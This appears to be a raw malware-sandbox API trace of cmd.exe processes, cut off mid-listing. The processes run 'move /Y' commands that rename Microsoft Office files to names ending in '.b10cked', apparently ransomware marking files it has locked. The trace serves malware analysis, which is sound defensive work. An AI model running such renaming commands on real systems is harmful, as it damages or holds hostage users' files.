0x5b886386 [0168.110] srand (_Seed=0x5b886386) [0168.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"" [0168.110] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"" [0168.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.111] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.111] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.111] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.111] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.111] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.111] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.111] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.111] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.111] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0168.111] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.111] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.111] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.111] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.111] GetEnvironmentStringsW () returned 0x2b2360* [0168.111] FreeEnvironmentStringsW (penv=0x2b2360) returned 1 [0168.111] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.111] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.111] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.112] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.112] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.112] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.112] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.112] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.112] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.112] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.112] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.112] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f700, lpFilePart=0x16f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f6fc*="Desktop") returned 0x18 [0168.112] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.112] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2b09f0 [0168.112] FindClose (in: hFindFile=0x2b09f0 | out: hFindFile=0x2b09f0) returned 1 [0168.112] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2b09f0 [0168.112] FindClose (in: hFindFile=0x2b09f0 | out: hFindFile=0x2b09f0) returned 1 [0168.113] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2b09f0 [0168.113] FindClose (in: hFindFile=0x2b09f0 | out: hFindFile=0x2b09f0) returned 1 [0168.113] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.113] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.113] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.113] GetEnvironmentStringsW () returned 0x2b0210* [0168.113] FreeEnvironmentStringsW (penv=0x2b0210) returned 1 [0168.113] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.114] GetConsoleOutputCP () returned 0x1b5 [0168.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.114] GetUserDefaultLCID () returned 0x409 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f840, cchData=128 | out: lpLCData="1") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.114] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.115] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.116] GetConsoleTitleW (in: lpConsoleTitle=0x2a0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.116] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.116] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.116] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.116] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.117] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.117] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.117] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.117] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.117] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.117] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.117] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0168.121] GetConsoleTitleW (in: lpConsoleTitle=0x16f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.256] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.256] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.256] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.256] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.256] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.256] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.256] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.256] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.256] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.256] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.256] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.256] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.256] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.256] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.256] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.256] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.256] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.256] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.256] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.256] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.256] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.256] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.257] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.257] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.257] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.258] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.259] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.260] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.260] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0168.260] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0168.260] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0168.260] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapird~1.trx")) returned 0x2020 [0168.261] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.261] SetErrorMode (uMode=0x0) returned 0x0 [0168.261] SetErrorMode (uMode=0x1) returned 0x0 [0168.261] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x16ec7c, lpFilePart=0x16ec64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", lpFilePart=0x16ec64*="MAPIRD~1.TRX") returned 0x3c [0168.261] SetErrorMode (uMode=0x0) returned 0x1 [0168.261] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.261] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0168.261] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0168.261] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapird~1.trx")) returned 0x2020 [0168.261] SetErrorMode (uMode=0x0) returned 0x0 [0168.261] SetErrorMode (uMode=0x1) returned 0x0 [0168.261] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x16f0f8, lpFilePart=0x16ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", lpFilePart=0x16ee90*="MAPIRD~1.TRX") returned 0x3c [0168.261] SetErrorMode (uMode=0x0) returned 0x1 [0168.261] SetErrorMode (uMode=0x0) returned 0x0 [0168.261] SetErrorMode (uMode=0x1) returned 0x0 [0168.262] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f300, lpFilePart=0x16ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x16ee90*="MAPIR.DLL.trx_dll.b10cked") returned 0x49 [0168.262] SetErrorMode (uMode=0x0) returned 0x1 [0168.262] SetLastError (dwErrCode=0x0) [0168.262] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll.b10cked")) returned 0xffffffff [0168.262] GetLastError () returned 0x2 [0168.262] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e80c) returned 0x2b2128 [0168.262] FindNextFileW (in: hFindFile=0x2b2128, lpFindFileData=0x16e80c | out: lpFindFileData=0x16e80c) returned 0 [0168.263] GetLastError () returned 0x12 [0168.263] FindClose (in: hFindFile=0x2b2128 | out: hFindFile=0x2b2128) returned 1 [0168.264] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2b1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1cb8) returned 0x2b2128 [0168.264] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0168.264] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x16eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0168.264] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll")) returned 0x2020 [0168.264] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mapir.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.265] FindClose (in: hFindFile=0x2b2128 | out: hFindFile=0x2b2128) returned 1 [0168.265] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ea58 | out: _Buffer=" 1") returned 9 [0168.265] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.265] GetFileType (hFile=0x7) returned 0x2 [0168.266] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.266] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e9e4 | out: lpMode=0x16e9e4) returned 1 [0168.266] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.266] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ea18 | out: lpConsoleScreenBufferInfo=0x16ea18) returned 1 [0168.266] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.267] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.267] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ea3c*=0x1a) returned 1 [0168.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.267] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.267] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.267] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.267] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.267] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.267] SetConsoleInputExeNameW () returned 0x1 [0168.267] GetConsoleOutputCP () returned 0x1b5 [0168.267] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.268] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.268] exit (_Code=0) Process: id = "287" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22724 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22725 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22726 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22727 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22728 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22729 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22730 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22731 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22732 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22733 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22852 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22853 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22854 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22855 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22856 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22857 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22858 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22859 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22860 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22861 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22862 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22863 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22864 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 